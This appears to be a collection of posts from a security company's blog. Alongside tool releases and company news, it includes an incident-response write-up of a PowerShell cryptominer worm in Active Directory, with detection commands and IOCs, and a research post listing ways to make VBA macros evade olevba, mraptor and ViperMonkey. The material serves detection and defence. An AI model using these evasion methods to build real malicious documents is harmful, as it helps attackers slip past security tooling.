“The excellent feedbacks we receive every day from our customers are the first step in evaluating the success of our work. This umpteenth acknowledgment proves that our vision and our experts’ skills are increasing recognized even globally, in an ever-competitive market, where sometimes, the wide offer makes difficult to recognize the best partner to rely on” said Bernardino Grignaffini – CEO & Founder of Certego.

Certego is part of ECSO "Cybersecurity Made in Europe" label

Pier Giorgio Bergonzi — Sat, 29 Oct 2022 22:00:00 GMT

Promote cybersecurity in the European Union by supporting ICT companies that offer cybersecurity services: this is the purpose of the "Cybersecurity Made in Europe Label".

The project, born within the European Cyber Security Organization (Ecso), a non-profit organization that works alongside the European Commission for IT security policies, represent an important moment of transition for the whole sector.

The objective of the creators is in fact to give a real "stamp" of quality to companies that provide cybersecurity services.

The label allow companies to enter a list of high-quality suppliers and will guarantee their recognition towards the international market.

Certego has proud to be part of this important label, which requires companies to meet important requirements:

be based in Europe;
provide reasonable assurance that there are no non-European responsibilities or authorities involved;
work primarily in Europe and demonstrate that they have more than 50% of R&D and staff located in the 27 EU countries and the UK;
provide reliable information security products and services according to ENISA basic basic security requirements for the procurement of secure ICT products and services.

Certego become Cisco Secure Endpoint partner

Pietro Delsante — Wed, 30 Mar 2022 22:00:00 GMT

As a Cisco Solution Partner, Certego implemented the Tactical Response service designed for Cisco Secure Endpoint that integrates Cisco's EDR solution into the Panoptikon SecOps Platform.

Secure Endpoint is a CISCO product that provides a unified solution for users and endpoints. Through an integrated platform named SecureX, it provides built-in XDR capabilities and enhanced endpoint protection to maximize operational efficiency of endpoint security. Through Certego Tactical Response integration, when Certego IRT detects malicious activities, it can automatically isolate the compromised hosts to block the attack.

Certego's Tactical Response solution for CISCO Secure Endpoint significantly reduces the time it takes to contain a cyber security incident by preventing further attacks and infections. It also minimizes the risk associated with ongoing incidents (e.g., by blocking resources related to further infection phases), all in a simple and automated way, reducing the workload of customer IT.

New IntelOwl Major Release v4

Matteo Lodi, Threat Intel Team Leader — Wed, 05 Jan 2022 23:00:00 GMT

Certego has always been strongly involved and participating in open source projects.

For this reason, we created the IntelOwl project more than 2 years ago (see the blog post). At that moment we did know that the cyber security community really struggled in automating common and daily routine tasks. IntelOwl aimed at filling that gap.

We succeeded. We had strong feedback from the community: we reached almost 2500 stars in Github and more and more people tried to participate in the project.

As Certego, we have been leveraging IntelOwl internally to facilitate and speed up the gathering of Threat Intelligence data. It is a tool that we can’t live without anymore.

Today we reached the first step of this process: we are happy to announce that we have published the new major version of one of the most successful Open Source Threat Intelligence projects.

This new version 4 release brings a new revamped Graphical User Interface!

The design was inspired by the same idea we got for Dragonfly, the next generation malware sandbox service that we released almost a year ago.

We strongly suggest you check all the details regarding this new release in the official Changelog and to try the new application by yourself!

As mentioned earlier, this is just the first step. We have been planning to add to the project some new exciting features that would transform it into a fully fledged Investigation platform that everyone working in cyber security could use for his own goal. If you want to be updated on everything that we are doing and participate in the discussions about the future of the platform, don’t forget that the project is public and everyone is welcome to the community around it! You can follow the project in Github here and to try the new application by yourself!

Thanks for reading and happy hunting!

Handling a distributed cryptominer AD worm

Gabriele Pippi, Threat Research Lead Engineer — Wed, 23 Dec 2020 23:00:00 GMT

Summary

Introduction
Malware
- Execution
- Defense Evasion
- Persistence
- Payload delivery
- Dropping malware components
  - Credential Access
  - Lateral Movements
- Download and Update / C&C
Detection
- Detecting Lateral Movements and persistences
- Detecting Infected Hosts
Response
- Containment
- Malware Removal
Conclusions
IOCs
About the author
Credits

1.Introduction

This and last week, the Certego Incident Response team handled a powershell based Active Directory compromise on multiple of our customer networks. Although the actors seemed to be intent on spreading a Cryptominer malware, due to some technical aspects the campaign could hide a second goal.

Considering that more and more attacks are aimed to making lateral movements to compromise enterprise domains, today we decided to share with you some details of detection and response actions performed by Certego IRT to handle these threats.

Note: to prevent antivirus from blocking this site we are forced to share the code via screenshots, the main samples have been uploaded to virustotal.

2.Malware

In most of the scenarios observed the threat came from unmonitored Domain Trusts, in the remaining cases we were engaged after the first access was already performed.

We can assume that the attacker established a foothold through valid domain credentials usage against exposed authenticated services, like RDP terminal server. The attacker may have obtained valid credentials exploiting data breach of third-party sites, phishing or dictionary attack/password spraying. In some cases we have found poor password policies which could motivate the last hypothesis.

Malware was differentiated between domain controllers, 32 and 64 bit hosts. The one installed on domain controllers has the most features.

The behavior identified by the malware is described below with its respective code block.

Execution

The runnig malware is usually found on an infected systems in the form of a powershell.exe or a schtasks.exe process usually spawned by WMI Provider Host ( wmiprvse.exe). The most of executables are loaded into the powershell memory space through a fixed version of ReflectivePEInjection script extracted from Invoke-Mimikatz or they are written into schtasks process via a Process Hollowing.

The powershell process is easily recognizable by its base64 encoded commandline. The schtasks process, on the other hand, occurs without any parameters and it's harder to notice.

If the XMRig has been written to the schtasks process you will notice a consumption of the CPU and network connections to suspicious ports. In general, since schtasks.exe without parameters displays basic information of tasks and exits, any schtasks process without parameters is potentially malicious.

Defense Evasion

As shown in some screenshots below, iex/Invoke-Expression and other dangerous cmdlets used for detection are obfuscated through environment variables.
Before making a lateral movement the malware adds an exception for powershell.exe inside Windows Defender through Add-MpPreference cmdlet

In-memory execution through powershell ReflectivePEInjection and a libpeconv based Process Hollowing injector.
In the most recent malware updates we noticed this powershell amsi bypass.

recent_client_agent_sample

Persistence

In some cases we observed successfully running malware launched from a remote host without a local persistence.

The persistences used by the malware are two WMI event subscription. The filters trigger the payload after 1 minute and about 6.5 or 3.8 hours from the system startup:

Some information used by the malware is inserted into the following custom WMI class:

The payload is a classic base64 powershell encoded command as shown in the screenshot.

Payload delivery

The payload served by the domain controller and the C&C is a powershell module encrypted with TripleDES and ciphermode CBC:

agen.ps1 sample

The module and the function de is called, the password and the salt are passed as parameters to the function:

The result is a powershell dropper.

Dropping malware components

The powershell dropper is a base64 blob of data containing multiple components:

rein.ps1 sample

Once the content has been decoded, the malware could drop one or more of the following components:

a) An XMRig cryptominer:

A simple XMRIG cryptominer which does not appear to be installed on domain controllers nor on low-performing hosts ( 32bit ).

To make the cryptominer work at its best the attacker disables sleep mode, standby and hibernation via powercfg. It also checks via netstat if there are connections from other previous versions of the cryptominer and stops the processes that make them.

sample

b) A libpeconv based Process Hollowing injector

This component is never dropped on domain controllers,

It was used to write the XMRig into the schtasks.exe process usually spawned by wmiprvse.exe.

sample

c) Re-compiled mimikatz DLL to perform Credential Access:

This component is installed on all hosts. We saw it running on the domain controller for the following steps:

Inject LSA to dump NTDS.dit credentials
DCSync

sample

d) The powershell script funs.ps1: uns_decoded.ps1.

This component is downloaded to any host, but with different functions.

By default it contains ReflectivePEInjection and Lateral Movements capabilities from Empire and PoshC2 projects for:

1.Remote Service Creation (aka SMBExec)
2.WMI Win32_Process Remote Process Creatio
3.Remote Task Scheduler Creation This last method leaks the credentials in the commandline twice.
4.Simple TCP scanner
5.EternalBlue Scanner
6.Test-net function, a multithreaded function to verify that the host is not already infected before a lateral movement

Through lateral movements the attacker executes a command to download or update the malware. Domain controllers malware are installed or updated via the web resource "/update" of the internal or external C&C.

If the host is not a domain controller the web resource " /sync" is used instead.

The version of the malware is monitored via the web resource " /banner" by comparing the WMI filter name.

In addition, these two functions are also dropped on the domain controller:

1.testhser This function drops the internal C&C server who will listen on port 49636 , the malware launches it and verifies that it works correctly. The rein script adds a rule on Windows firewall to allow server binding:
2.plant-ags: The function used by the domain controller to deploy the malware on targets through internal C&C. To performe the deploy it exploits lateral movements techniques and a powershell module masked as gpt.ini downloaded through SMB.

e) The powershell script agen.ps1: agen_decoded.ps1

f) Internal C&C Malware on DC:

A small and simple http server masked as a fake and unsigned dfsvc.exe process ( a licit Windows Server process )

The server is developed through Mongoose OS "an Internet of Things (IoT) Firmware Development Framework" designed to be small and light.

This server and the plants-ags function are command and control system, by matching the agent on virustotal the server is identified as a cryptominer but this is a false positive.

During the installation phase the malware extract the agent.ps1 script from the server binary, easily viewable between the strings. By matching this code the antivirus incorrectly report the server as a cryptominer malware.

sample.

g) A simple shellcode

sample.

h) A vulnerable driver

WinRing0x64.sys

This driver is dropped on all hosts except the domain controller. Even though it is used directly by XMRig, the driver is present in the most common vulnerable drivers blacklists.

This driver allows any user to perform a local privilege escalation and in generally some ring 0 activities:

"WinRing0 allows users to read and write to arbitrary physical memory, read and modify the model specific registers (MSRs), and read/write to IO ports on the host" 2020-14979.

Not needing other privileges at these points of the killchain it is likely that the attacker will use it only for XMRig, however leaving the driver there can expose the host to very serious security problems related to LPE and to the execution of ring 0 code.

For example:

Privilege escalation in user space
Hinder the operation of security products
Remove process protection from critical processes and add process protection to malware components
Hide traces of malware via a ring 0 rootkit

This technique is called Bring You Own Vulnerable Driver (BYOvD) and allows you to bypass the following Microsoft security measures:

“The 64-bit versions of Vista require that all device drivers be digitally signed, so that the creator of the driver can be identified” wikipedia 2006.
“Starting with new installations of Windows 10, version 1607, the previously defined driver signing rules will be enforced by the Operating System, and Windows 10, version 1607 will not load any new kernel mode drivers which are not signed by the Dev Portal. OS signing enforcement is only for new OS installations; systems upgraded from an earlier OS to Windows 10, version 1607 will not be affected by this change.” techcommunity.microsoft.com Jul 26, 2016

More technical details

3.Detection

Detecting Lateral Movements and persistences

Due to the complexity of corporate networks it is common to spot an attacker from an unmonitored internal network. The detection carried out in this phase of the killchain is much more complex due to false positives and unknown/poorly documented protocols.

A common approach used is to identify the effects of a lateral movement, therefore the activities of the malware installed on board through blacklisted IOCs, anomalous network and host activities.

So what are the benefits of identifying lateral movements?

The attacker does not necessarily perform the same actions on all machines. In this scenario, for example, some distinctions were made for both domain controllers, 64 and 32-bit hosts.
In the absence of vulnerabilities, lateral movements are carried out through Microsoft internal network protocols, these protocols have in many cases some juicy plain text information.
In some cases it is possible to delete a persistence created remotely on the target before the malware is executed for the first time.
Studying the lateral movement can allow us to contain host infection in the response phase.

Where the detection IOCs produces a high number of false positives it is possible to use these indicators to carry out threat hunting activities.

To detect lateral movements through network traffic it is necessary to receive infralan traffic on a network sensor, this is difficult due to the volume of traffic but theoretically possible through internal network segmentation. However, even if it is only a small part, it is possible to identify the internal traffic passing through the firewall.

Since the first analyzes we have identified that the attacker used the following MS-RPCE network sub-protocols to perform lateral movements:

MS-SCMR, through CreateServiceW,StartServiceW and DeleteService operations. This traffic is completely in plain text if used via named pipe over MS-SMB2. Among the main information in clear text we find the name of the service and the command executed. MS-RPC over TCP traffic is normally preferred over MS-RPC over named pipes but in this case the attacker forces the traffic on the 445.
MS-WMI through ExecMethod operation, encrypted by default but traceable through timestamp, authentication and MS-RPC operation names.
MS-TSCH through SchRpcRegisterTask, SchRpcRun, SchRpcEnableTask, SchRpcDelete operations, encrypted by default but traceable in the same way of WMI protocol.

Together with WinRM they are the main protocols used to perform lateral movements, this is because in case the target uses the windows firewall they are often enabled for systemic reasons. For this reasoning, the most widely used protocol, enabled by default in each domain is SCMR, used for example by the PsExec utility and supported by any malware or redteam tool to perform lateral movements

Note: In scenarios where the windows firewall is disabled the possible lateral movement techniques are a lot.

To track this type of activity it is possible to do it over the network or aboard the host.

To correlate information on the host it is possible to proceed with an EDR, with Sysmon or through Windows Eventlogs. Since we do not believe that collecting logs alone without Sysmon is enough, we will assume that either an advanced EDR or Sysmon is present on the machines.

Note: ETW and Audit Policy Windows event logs Categories are considered out of scope since they are not supported by main security tools functions to perform detection and threat hunting.

Through the host it is necessary to correlate the connections of the following processes:

svchost -k RPCSS : MS-RPC over TCP ( 135 TCP , 593 HTTPS )

ntoskrnl.exe : MS-RPC over named pipes (139 TCP, 445 TCP)

NB The first phase of an MS-RPC connection, the endpoint mapper (EPM), although reachable through a named pipe is usually available through TCP.

Correlate authenticated sessions and the actions performed by the following processes:

Remote Task Creation

Modifications of this filesystem path by " C:\windows\system32\svchost.exe -k netsvcs ( -p -s Schedule on recent OS)": C:\windows\system32\tasks*

Modifications of this registry paths by the same process:

software\microsoft\windows\ nt\currentversion\schedule\taskcache*\path software\microsoft\windows\ nt\currentversion\schedule\taskcache\tree*

The task is spawned as a child of one of the following processes depending on the operating system:

C:\windows\system32\svchost.exe -k netsvcs -p -s Schedule
C:\windows\system32\svchost.exe -k netsvcs
C:\windows\system32\taskeng.exe

EventLogs: 4624 and 4672 and from 4698 to 4702

Remote Service Creation

Modifications of this registry paths by services.exe:

System\ControlSet001\Services*\imagepath

In the registry path before the imagepath there will be the name of the service.

This indicator also allows us to identify a variant of this technique that plans to modify a pre-existing service through ChangeServiceConfig* operations in order to stay under the radar: Remote Service Modification

The malware process, that is the malicious service, will be spawned as a child of services.exe

EventLogs: 4624 and 4672 and 4697 or 7045

Remote Process Creation through Win32_Process and WMI Event Subscription

Since there is no persistence, the creation of the remote process can be identified by directly correlating the child processes of wmiprvse.exe.

In case of persistence it is possible to detect the modification by C:\Windows\system32\svchost.exe -k netsvcs of the following registry key:

software\microsoft\wbem\ess*cimv2

The data is saved in these files from C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt:

C:\Windows\System32\wbem\Repository\OBJECTS.DATA
C:\Windows\System32\wbem\Repository\INDEX.BTR
C:\Windows\System32\wbem\Repository\MAPPING

Unfortunately these files are modified too frequently for other reasons and they make too many false positives also for threat hunting operations, we therefore recommend using the registry key.

Detect malware interactively:

powershell /c "Get-WMIObject -Namespace root\Subscription -Class __EventConsumer | ? { $_.CommandLineTemplate -Match \".*powershell.*-W\ Hidden\ .*\ -E\ \"}"
powershell "Get-CimClass -NameSpace 'root\default' | ? {$_.CimClassName -Match 'systemcore_updater'}"
findstr /i "powershell.exe Event8" C:\Windows\System32\wbem\Repository\OBJECTS.DATA

Sysmon events:from 19 to 21.

Detecting Infected Hosts

Despite the complexity of the attack in this case it was rather easy to detect infected hosts.

Excluding the most recent versions of the malware, most of the C&C are present in the main blacklists. Through good threat intelligence it is possible to find the indicators automatically and detect these network activities.

Detect at network level hosts where the miners was running via plaintext json-rpc usage is trivial and it is a very strong indicator for most of the widespread miners.

4.Response

Containment

Once learned that the malware was a distributed cryptominer worm, for the most critical situations we have decided to apply Certego's lockdown procedures.

These procedures rely on enabling, managing and exploiting windows firewall and some of its dependencies to selectively block the protocols used by the malware to perform lateral movements maintaining proper functioning of Active Directory.

These procedures along with network-wide restrictions on the firewall and our telemetry systems allowed to block lateral movements and C&C activities keeping the network under close monitoring, giving us time to carry out the necessary analysis.

Malware Removal

Once the malware was isolated, it was trivial to remove it. For older versions it was enough to simply manually remove the persistence using the following commands:

powershell /c "Get-WMIObject -Namespace root\Subscription -Class __EventConsumer | ? { $_.CommandLineTemplate -Match \".*powershell.*-W\ Hidden\ .*\ -E\ \"} | Remove-WmiObject -Verbose"
powershell "([WmiClass] 'root\default:systemcore_Updater8') | Remove-WmiObject -Verbose"

Considering that the action is irreversible, we recommend that you first check with the commands present in the detection that it is not a false positive***.

Once persistence is removed a good updated antivirus is usually enough to kill most of other malware components. If the components have just been updated it is common that the antivirus is not able to kill them. In that case we recommend that you look for the indicators described in the malware execution part.

# 5.Conclusions

Given the rapidity of intervention, we cannot exclude that the malware is able to drop other threats in addition to those observed. However, we have not found any other types of malware other than those listed in this article.

We have handled a large number of Active Directory compromises based on this type of cryptominer worm. The attacker's goal seems to be to periodically update cryptominers on all machines in the domain through domain controllers causing a periodic denial of service on the whole domain.

More and more actors begin to perform lateral movements and to exploit AD mechanisms to achieve their goal. Knowing these mechanisms is now an essential prerequisite for managing this type of threats.

6.IOCs

Hashes

52f510d047e6270c9b916d76725529c8
7e0bc1c01f44c7a663d82e4aff71ee6c
91ff884cff84cb44fb259f5caa30e066
98deacafd4a35fc257d2f381f78b9b3b
d129842ccf642d1e71c5e851c0ced337
d1aed5a1726d278d521d320d082c3e1e
fd044540a38b3422abf275af9e6ab3c2

Domains/IPs

sjjjv[.]xyz
winupdate.firewall-gateway[.]de
dfdfjkbcv[.]net
51.15.65[.]182
51.255.34[.]118
213.32.29[.]143
217.182.169[.]148
45.10.69[.]141
45.140.88[.]145
5.196.23[.]240
51.15.54[.]102
205.209.152[.]78

Ports

Web resources

/sync
/banner

WMI class: root\default:systemcore_Updater8

WMI filter names: "SCM Event8 Log Filter" or "SCM Event8 Log Filter2"

WMI consumer names: "SCM Event8 Log Consumer" or "SCM Event8 Log Consumer2"

Task Name: sysupdater0

7.About the author

Gabriele Pippi (Twitter).

8.Credits

Thanks to Davide Setti (Twitter) and Marco Giovanetti (Twitter) for the collaboration.

Introducing PcapMonkey

Federico Foschini — Sun, 27 Sep 2020 22:00:00 GMT

PcapMonkey is a project that will provide an easy way to analyze pcap using the latest version of Suricata and Zeek.

It can also save Suricata and Zeek logs in Elasticsearch using the new Elasticsearch Common Schema or the original field names. PcapMonkey uses official docker containers (when available) for most images and aims to be easy and straightforward to use.

Features

PcapMonkey let's you run one or multiple pcaps and imports all logs to elasticsearch.
PcapMonkey keeps the "official" Zeek and Suricata fields names so you can look them up on the official documentation
It let you edit directly Suricata and Zeek configuration and scripts so you can test quickly new features
PcapMonkey comes with some very useful Zeek scripts like Ja3 and File extractor
It's possible to enable logging in ECS to leverage all ElasticSerch SIEM features
Let's you import also windows event files (BETA)

Advanced VBA macros: bypassing olevba static analyses with 0 hits

Gabriele Pippi, Threat Research Lead Engineer — Tue, 07 Jul 2020 22:00:00 GMT

Summary

Introduction
Tests scope
APT macro analyses
Observations
Tests carried out:
- Bypassing CreateObject detection
- Crafting our easy custom undetected obfuscation
- Killing ViperMonkey
- Undetected code execution methods/functions
- Undetected methods/functions to get our malicious file
- Undetected autoexec sub events
- Results
Suggestions for improvement
Conclusions
About the author

1.Introduction

One of the most common techniques for getting a foothold on a network client is based on Office files containing a malicious VBA macro. VBA macros are still widely used in a business context and, despite the mitigations offered by security vendors and Microsoft, it is still essential to detect evasion techniques in order to catch smart attackers.

On the attacker's side, there is plenty of public projects to setup, weaponize and obfuscate a macro while on the defenser's side there is a reasonable number of public projects, among the most famous projects to de-obfuscate and detect malicious VBA macro there are certainly olevba, MacroRaptor and ViperMonkey. At Certego, we also use these tools to perform automatic static analysis of VBA macro.

Today we would like to share a test carried out last week on the resilience of public logic offered by olevba, mraptor and vipermonkey. These tests were even more motivated by some autoexec sub functions identified in the wild that were not detected by our implementation of olevba.

All the tests carried out are aimed at encouraging the red teams to test new bypass techniques and improving the detection of olevba, mraptor and vipermonkey public projects.

2.Tests scope

All tests were carried out on a fully patched Windows 10 client with last build and version.
Macro based PoCs must work with medium integrity level.
The tests carried out focus on the static analysis that can be performed by mraptor and olevba; in these tests we will consider out of scope the dynamic analysis from the point of view of a sandbox, an EDR and any ASR bypass.
During the tests, we decided to include vipermonkey vba emulator in the scope.
All the tests carried out start from the assumption that the latest versions of olevba, mraptor and vmonkey have been implemented out of the box.
Common users are not always able to complete certain tasks keeping all ASR rules enabled, for this reason we consider disabled at least the following rules:
- Block all Office applications from creating child processes
- Block Office applications from creating executable content

3.APT macro analyses

There are many ways to obfuscate a VBA macro, but how much do I have to obfuscate my macro to completely evade the analyses of a prepared blue team? It is important to know the weak points of a VBA obfuscation/evasion technique in order to detect it.

We started by learning from public examples of high-level attacks, then by analyzing through the tools mentioned above some noteworthy APT macro samples.

We decided to report the following three examples:

2019-06-06 gorodpavlodar.doc from APT28

APT28 is one of the groups with advanced TTPs.

VBA code:

olevba result:

2019-06-06 graphic.doc graphic.doc, document dropped from the previous sample and called through Word.Application COM.

VBA code:

olevba result:

2016-11-09 election-headlines-FTE2016.docm from APT29

The sample is a CDFV2 Encrypted with password 3209. password password source

APT29 is one of the groups with advanced TTPs

VBA code:

olevba result:

2020-03-03 비건미국무부부장관서신20200302.doc from Kimsuky APT

One of the more recent APT macro.

VBA code:

olevba result:

4.Observations

We have observed that:

Some useful functions to obfuscate our macro are used to detect it. Ex: Evilclippy tricks like VBA stomping/pcode obfuscation are currently detected by olevba.
There is no known way to obfuscate Sub Events, like AutoExec.
There is no known way to obfuscate functions and methods.
There are many examples of APT macros that prefer to leave the macro in plain text rather than obfuscate it through a well known technique or suspicious functions.
Spotting Win32 Windows API through the Lib Declare Statement is trivial and in some contexts blue teams are beginning to block them through ASR.
We also identified the following technical details related to the detection of the examined tools :
- Obfuscation performed through the Mid and the Array functions is not detected by the examined tools. There are plenty of ways to obfuscate the code and it does not seem worth detecting them all through a static approach.
- ExecQuery and other dangerous WMI methods to perform code execution like Create are not detected by the examined tools.
- ExpandEnvironmentStrings method of WScript.Shell Object is an Environ alternative to retrieve environment variables which not trigger by the examined tools.

Example:

Other undetected alternatives could be:
- Using Environment Wscript.Shell method
- Calling an ExecQuery on Win32_Environment
- Querying directly inside HKCU\Environment
In the common implementations of these tools some hits are systematically discarded to avoid false positives. Hex string detection in olevba is an example.

However, in well-managed infrastructures, it is possible to research some mandatory subroutines, methods and functions to systematically detect macros through a static approach, and to engaging an analyst.

5.Tests carried out

Starting from these osservations we have tried to build at least one PoC that performs 0 hits on olevba and a "macro ok" result in mraptor.

These are three minimum requirements for getting a foothold through a VBA macro:

An Autoexec Sub Event to trigger our macro
A code execution method/function
Except for some trivial cases, you will normally need at least a COM/OLE/ActiveX Object, so you need to call at least one function like CreateObject.

Bypassing CreateObject detection

Even if performing alerting only on CreateObject is pretty impossible due to FP, it is possible to avoid this hit in some scenarios through GetObject.

At the time of writing, GetObject is not reported as a suspicious function by olevba.

Some automation servers have a running instance by default. Using one of these objects, it is possible to use GetObject, avoiding the call to CreateObject at all. See: differences between GetObject and CreateObject.

For these tests we decided to start with one of the most common objects with a default instance: Shell.Application.

Crafting our easy custom undetected obfuscation

After a first look we decided to use the CLSID avoid Shell.Application pattern match detection.

Here is how to easily get Shell.Application CLSID through powershell:

So instead of:

We used:

However the string was detected in a heuristic way by exchanging the CLSID with a hex string.

As mentioned above, it is a olevba hit that makes tons of FPs like this.

Despite this fact, we still tried to obfuscate this string creating our own obfuscation technique. It would also come in handy later to obfuscate our exploit.

After some research we discovered that adding chunks of strings to a variable containing an empty string prevents olevba from detecting and deobfuscating the string:

Note: without using a variable olevba detects the technique.

Killing ViperMonkey

After a quick test, we realized that ViperMonkey is able to decode our obfuscation method.

Despite being a big project, ViperMonkey is a experimental emulator, developers who integrate it into their platform are used to handling considerable number of crashes with legitimate macros, ergo seeing a ViperMonkey crash is not suspicious at all.

To crash vmonkey you need to find some VBA code accepted by our office program that crashes the vmonkey parser.

After some fuzzing we have identified the following simple code:

A declaration of a function with at least one argument inside an if statement will do the job. Microsoft Word will successfully run the macro:

The vmonkey parser will fail:

Undetected code execution methods/functions

We started digging into the documentation looking for unknown execution methods of Shell.Application Object

This is the section in the olevba code where the suspicious methods/functions list is defined by regex or keyword.

We have identified three interesting examples:

InvokeVerb and GitHub Pages: dropping an executable and calling the verb "Open" it is possible to run it. As soon as I spotted these methods I tweeted them. DoIt: slightly more tricky but same concept of invokeverb. ControlPanelItem: by dropping a malicious .cpl into the current directory, it is possible to execute malicious code While we were looking for undetected methods to perform code excecution, we have observed that, surprisingly, the Create method of Win32_Process, retrievable only through GetObject, is not yet detected by olevba.

However, we decided to avoid it because it has been used in many opportunistic campaigns and some custom implementations, such as ours, easily detect it.

All other interesting methods of WMI code execution, which are not detected by the analyzed tools, require a high integrity level, which is out of scope.

Undetected methods/functions to get our malicious file

Since we have identified three methods to launch an executable without arguments, we need a function to get our malicious executables.

In order not to leave our executable embedded in the document we decided to download our sample remotely through an UNC path

To achieve this task we decided to exploit SMB redirector or WebDAV redirector, this is because it is not possible to map a UNC resource on a unit or link it with a medium integrity level.

Allowing outbound SMB traffic is a bad practice, so we decided to take advantage of WebDav SSL (HTTPS).

So we decided to exploit the CopyHere.Application method to download our executables via WebDav SSL.

During the tests we also found that:

Win32_Directory, a class with some filesystem methods not detected by olevba, does not support SMB/WebDav redirector.
FilesystemObject supports the following undetected methods to achieve this task:

We decided to avoid FileSystemObject because it didn't work through GetObject, even if it is not enough to detect our samples it was interestingly keeping us on the 0 hits..

Undetected autoexec sub events

This is the section in the olevba code where the autoexec list is defined by regex or keyword

Hunting for undetected autoexec sub event:

https://docs.microsoft.com/en-us/office/vba/api/ov...

Docs/Office/VBA/Reference//Object model//Events/

We have identified three interesting examples:

Document_ContentControlOnEnter: it triggers when a user "enters" a content control, there are several content controls that can easily attract a user click.
Worksheet_FollowHyperlink: it triggers when a user clicks on a link inside a worksheet, the link can also point to a worksheet component.
Worksheet_Calculate: "Occurs after the worksheet is recalculated for the Worksheet object", this autoexec sub event is the most interesting we have envied: by using a cell with a formula that points to itself, it is possible to perform an autoexec without user interaction. As shown in the gif of the next section a prompt is shown to the user but, whatever the answer is, the macro is still executed.

Results

The outputs shown below are those of the following command:

olevba --decode --reveal <doc> # 0.56dev6 on Python 2.7.17

Document_ContentControlOnEnter.docm:

Worksheet_FollowHyperlink.xlsm:

In this case the VB_Base attribute triggers olevba, olevba exchanges the GUID for a Hex String. This is a known and usually filtered false positive. For this reason we can safely consider this sample as one with 0 hits.

Worksheet_Calculate.xlsm:

Also here as in the previous sample the hit is due to the VB_Base attribute.

Virustotal

For these tests only static analysis is significant, however these are the samples:

Document_ContentControlOnEnter.docm

Worksheet_FollowHyperlink.xlsm:

Worksheet_Calculate.xlsm

6.Suggestions for improvement

In order to detect the techniques proposed through olevba / mraptor, it would be important to note the following:

There are plenty of ways to obfuscate the code and it doesn't seem worth detecting them all through a static approach.
Although it is always important to take advantage of the attacker's mistakes, we think that the strength of a static analysis is to be able to detect all the keywords that cannot be obfuscated.
None of the tools analyzed detects the CLSID, even if dealing with strings it is particularly easy to obfuscate them.
There is a lot of room for improving the detection of Win32 Windows API.
This is the list of all the non-obfuscable keywords identified during our tests that olevba is unable to detect:
- Filesystem interaction and UNC downloading functions:
  - CopyHere
  - MoveHere
  - CopyFolder
  - MoveFile
  - MoveFolder
- GetObject
- Expand environment variables:
  - ExpandEnvironmentStrings Wscript.Shell method
  - Using Environment Wscript.Shell method
  - Calling an ExecQuery on Win32_Environment
- Functions and methods to perform code execution:
  - Create
  - InvokeVerb and InvokeVerbEx
  - DoIt
  - ControlPanelItem
  - AppleScriptTask # OSX
- Autoexec sub events:

The previous list was proposed on the public project through the following pull request: https://github.com/decalage2/oletools/pull/591

7.Conclusions

We have shown that digging in the documentation and with a little fuzzing it is possible to craft a 0 hit macro.
Chaining these samples with an unknown sandbox detection check and esoteric COM objects could have really unpleasant effects.
Implementing an open-source out-of-the-box solution may not be enough to defend your infrastructure.
It is very important to carry out periodic internal tests on all the detection components of your platform.
Performing periodic internal tests on all the detection components of the platform could significantly increase the detection capacity of your platform.

8.About the author

Gabriele Pippi, Threat Research Lead Engineer Twitter

Certego research at the HITB Security Conference

Certego Research Team — Sun, 10 May 2020 22:00:00 GMT

Certego has always promoted and supported Open Source Development culture. Some of us are active members of the Honeynet Project and have contributed to some famous open source tools like Cuckoo Sandbox or Thug.

With the goal to help the security community to fight cyber threats, we have released two new projects this year: Intel Owl to aid cyber threat intelligence operations and Pcapoptikon2 to help analysts with writing IDS signatures.

Meanwhile we have been focusing our research on finding new ways to analyze complex malware. Our own Simone Berni has been working on the development of a new open source tool and just recently, also thanks to his work, its first 1.0 version was released: Qiling, an advanced binary emulation framework.

On the 25th April 2020, Simone had the opportunity to show the results of his work at the famous Hack In The Box Security Conference together with the Qiling creator, Lau Kai Jern.

HITB Conference: Technical details

Qiling is an advanced binary emulation framework that supports Windows, MacOS, Linux and BSD.

Written in Python and based on Unicorn Engine, Qiling is designed to provide high level APIs and fine-grain instrumentation, allowing you to place hooks at every level.

Certego chose to help the development of Qiling with Simone Berni's work.

During his presentation, Simone showed how it is possible to use Qiling as a sandbox to analyze arbitrary malware.

In particular, he prepared two different demo scenarios: Al-khaser and Gandcrab.

Al-Khaser Demo

The first scenario is a POC malware application that aims to stress an anti-malware system by checking if the sandbox is fortified and stealthy enough.

During the emulation of Al-khaser, it is possible to understand two things mainly: how stealthy Qiling is and how much it is easy to use. Not everything of Al-khaser has been emulated, Simone implemented only the debugger detection task.

Moreover, Qiling does not pass every single test made by Al-khaser (it passes 85% of checks) but the developers are working on them even right now.

The second point of this demonstration is to understand how we can use Qiling to perform a deep analysis: for example, the emulation of the function that prints the output had an issue: thanks to the API offered by Qiling, Simone was able to replace this function entirely with just 3 lines of code, thus obtaining the expected outputs.

Al-Khaser Demo

Here, we are talking about a famous ransomware, which is very interesting because it uses different sandbox evasion techniques before executing itself.

The demo of Gandcrab shows how powerful Qiling can be when used as a sandbox. Simone, during his work, implemented the concept of "Profiles", later extended by the Qiling team, and the core feature to analyze malware.

The profile is just a configuration file that describes everything about the emulation: it started as a simple file containing only the Windows version that Qiling has to emulate; later, it was extended to contain information about the Volumes, Drives, Permissions and Network configuration. Now it is possible to have a profile for every OS (Linux, BSD e MacOS are supported), and it is even possible to change the emulation parameters from this config file.

Simone demonstrated how much information it is possible to retrieve thanks to Qiling during the analysis of a ransomware like Grandcrab: every registry accessed is stored, every "printf" is saved (so it is possible to retrieve memory that has been copied from one place to another), every syscall and kernel call is stashed for future analysis. With a little bit more details, he explained how Gandcrab tries to retrieve every piece of information about the victim machine and how the malware stores the stolen information.

At the end of the demo, Simone shows how it is possible to change the Profile to change the behaviour of Gandcrab.

For example, you can change its permissions: when Gandcrab is executed as a user, it will spawn a shell to re-execute itself as administrator.

Another strange behaviour Simone discovered can be observed when you apply a russian keyboard layout in Qiling. Again, this is possible to do so by simply adding a registry key and the desired value to the profile. When executed in an environment that has a russian keyboard, Gandcrab would kill itself.

Conclusions

Qiling is a powerful tool, continuously developed and improved every single day: in the future it will be a common framework that malware analysts have to be familiar with.

Certego will continue to contribute to this project to improve the chances of everyone in fighting malware.

Intel Owl 1.0.0 released

Mon, 06 Apr 2020 22:00:00 GMT

